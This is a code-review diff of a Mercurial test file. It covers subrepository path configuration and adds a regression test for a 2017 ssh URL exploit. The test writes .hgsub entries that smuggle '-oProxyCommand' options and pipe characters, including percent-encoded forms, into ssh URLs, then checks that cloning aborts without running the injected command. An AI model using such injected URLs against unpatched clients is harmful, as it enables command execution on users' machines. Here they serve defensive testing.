1719 (removal of ".hgsub" itself)
1720
1720
1721 $ hg diff --nodates -c 8 .hgsubstate
1721 $ hg diff --nodates -c 8 .hgsubstate
1722 diff -r f94576341bcf -r 96615c1dad2d .hgsubstate
1722 diff -r f94576341bcf -r 96615c1dad2d .hgsubstate
1723 --- a/.hgsubstate
1723 --- a/.hgsubstate
1724 +++ /dev/null
1724 +++ /dev/null
1725 @@ -1,2 +0,0 @@
1725 @@ -1,2 +0,0 @@
1726 -e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
1726 -e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
1727 -7af322bc1198a32402fe903e0b7ebcfc5c9bf8f4 t
1727 -7af322bc1198a32402fe903e0b7ebcfc5c9bf8f4 t
1728 $ hg log -r 8 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1728 $ hg log -r 8 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1729 f94576341bcf 000000000000
1729 f94576341bcf 000000000000
1730
1730
1731 Test that '[paths]' is configured correctly at subrepo creation
1731 Test that '[paths]' is configured correctly at subrepo creation
1732
1732
1733 $ cd $TESTTMP/tc
1733 $ cd $TESTTMP/tc
1734 $ cat > .hgsub <<EOF
1734 $ cat > .hgsub <<EOF
1735 > # to clear bogus subrepo path 'bogus=[boguspath'
1735 > # to clear bogus subrepo path 'bogus=[boguspath'
1736 > s = s
1736 > s = s
1737 > t = t
1737 > t = t
1738 > EOF
1738 > EOF
1739 $ hg update -q --clean null
1739 $ hg update -q --clean null
1740 $ rm -rf s t
1740 $ rm -rf s t
1741 $ cat >> .hg/hgrc <<EOF
1741 $ cat >> .hg/hgrc <<EOF
1742 > [paths]
1742 > [paths]
1743 > default-push = /foo/bar
1743 > default-push = /foo/bar
1744 > EOF
1744 > EOF
1745 $ hg update -q
1745 $ hg update -q
1746 $ cat s/.hg/hgrc
1746 $ cat s/.hg/hgrc
1747 [paths]
1747 [paths]
1748 default = $TESTTMP/t/s
1748 default = $TESTTMP/t/s
1749 default-push = /foo/bar/s
1749 default-push = /foo/bar/s
1750 $ cat s/ss/.hg/hgrc
1750 $ cat s/ss/.hg/hgrc
1751 [paths]
1751 [paths]
1752 default = $TESTTMP/t/s/ss
1752 default = $TESTTMP/t/s/ss
1753 default-push = /foo/bar/s/ss
1753 default-push = /foo/bar/s/ss
1754 $ cat t/.hg/hgrc
1754 $ cat t/.hg/hgrc
1755 [paths]
1755 [paths]
1756 default = $TESTTMP/t/t
1756 default = $TESTTMP/t/t
1757 default-push = /foo/bar/t
1757 default-push = /foo/bar/t
1758
1758
1759 $ cd $TESTTMP/t
1759 $ cd $TESTTMP/t
1760 $ hg up -qC 0
1760 $ hg up -qC 0
1761 $ echo 'bar' > bar.txt
1761 $ echo 'bar' > bar.txt
1762 $ hg ci -Am 'branch before subrepo add'
1762 $ hg ci -Am 'branch before subrepo add'
1763 adding bar.txt
1763 adding bar.txt
1764 created new head
1764 created new head
1765 $ hg merge -r "first(subrepo('s'))"
1765 $ hg merge -r "first(subrepo('s'))"
1766 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
1766 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
1767 (branch merge, don't forget to commit)
1767 (branch merge, don't forget to commit)
1768 $ hg status -S -X '.hgsub*'
1768 $ hg status -S -X '.hgsub*'
1769 A s/a
1769 A s/a
1770 ? s/b
1770 ? s/b
1771 ? s/c
1771 ? s/c
1772 ? s/f1
1772 ? s/f1
1773 $ hg status -S --rev 'p2()'
1773 $ hg status -S --rev 'p2()'
1774 A bar.txt
1774 A bar.txt
1775 ? s/b
1775 ? s/b
1776 ? s/c
1776 ? s/c
1777 ? s/f1
1777 ? s/f1
1778 $ hg diff -S -X '.hgsub*' --nodates
1778 $ hg diff -S -X '.hgsub*' --nodates
1779 diff -r 000000000000 s/a
1779 diff -r 000000000000 s/a
1780 --- /dev/null
1780 --- /dev/null
1781 +++ b/s/a
1781 +++ b/s/a
1782 @@ -0,0 +1,1 @@
1782 @@ -0,0 +1,1 @@
1783 +a
1783 +a
1784 $ hg diff -S --rev 'p2()' --nodates
1784 $ hg diff -S --rev 'p2()' --nodates
1785 diff -r 7cf8cfea66e4 bar.txt
1785 diff -r 7cf8cfea66e4 bar.txt
1786 --- /dev/null
1786 --- /dev/null
1787 +++ b/bar.txt
1787 +++ b/bar.txt
1788 @@ -0,0 +1,1 @@
1788 @@ -0,0 +1,1 @@
1789 +bar
1789 +bar
1790
1790
1791 $ cd ..
1791 $ cd ..
1792
1793 test for ssh exploit 2017-07-25
1794
1795 $ cat >> $HGRCPATH << EOF
1796 > [ui]
1797 > ssh = sh -c "read l; read l; read l"
1798 > EOF
1799
1800 $ hg init malicious-proxycommand
1801 $ cd malicious-proxycommand
1802 $ echo 's = [hg]ssh://-oProxyCommand=touch${IFS}owned/path' > .hgsub
1803 $ hg init s
1804 $ cd s
1805 $ echo init > init
1806 $ hg add
1807 adding init
1808 $ hg commit -m init
1809 $ cd ..
1810 $ hg add .hgsub
1811 $ hg ci -m 'add subrepo'
1812 $ cd ..
1813 $ hg clone malicious-proxycommand malicious-proxycommand-clone
1814 updating to branch default
1815 abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path' (in subrepository "s")
1816 [255]
1817
1818 also check that a percent encoded '-' (%2D) doesn't work
1819
1820 $ cd malicious-proxycommand
1821 $ echo 's = [hg]ssh://%2DoProxyCommand=touch${IFS}owned/path' > .hgsub
1822 $ hg ci -m 'change url to percent encoded'
1823 $ cd ..
1824 $ rm -r malicious-proxycommand-clone
1825 $ hg clone malicious-proxycommand malicious-proxycommand-clone
1826 updating to branch default
1827 abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path' (in subrepository "s")
1828 [255]
1829
1830 also check for a pipe
1831
1832 $ cd malicious-proxycommand
1833 $ echo 's = [hg]ssh://fakehost|touch${IFS}owned/path' > .hgsub
1834 $ hg ci -m 'change url to pipe'
1835 $ cd ..
1836 $ rm -r malicious-proxycommand-clone
1837 $ hg clone malicious-proxycommand malicious-proxycommand-clone
1838 updating to branch default
1839 abort: no suitable response from remote hg!
1840 [255]
1841 $ [ ! -f owned ] || echo 'you got owned'
1842
1843 also check that a percent encoded '|' (%7C) doesn't work
1844
1845 $ cd malicious-proxycommand
1846 $ echo 's = [hg]ssh://fakehost%7Ctouch%20owned/path' > .hgsub
1847 $ hg ci -m 'change url to percent encoded pipe'
1848 $ cd ..
1849 $ rm -r malicious-proxycommand-clone
1850 $ hg clone malicious-proxycommand malicious-proxycommand-clone
1851 updating to branch default
1852 abort: no suitable response from remote hg!
1853 [255]
1854 $ [ ! -f owned ] || echo 'you got owned'
1855
1856 and bad usernames:
1857 $ cd malicious-proxycommand
1858 $ echo 's = [hg]ssh://-oProxyCommand=touch owned@example.com/path' > .hgsub
1859 $ hg ci -m 'owned username'
1860 $ cd ..
1861 $ rm -r malicious-proxycommand-clone
1862 $ hg clone malicious-proxycommand malicious-proxycommand-clone
1863 updating to branch default
1864 abort: potentially unsafe url: 'ssh://-oProxyCommand=touch owned@example.com/path' (in subrepository "s")
1865 [255]
General Comments 0
You need to be logged in to leave comments. Login now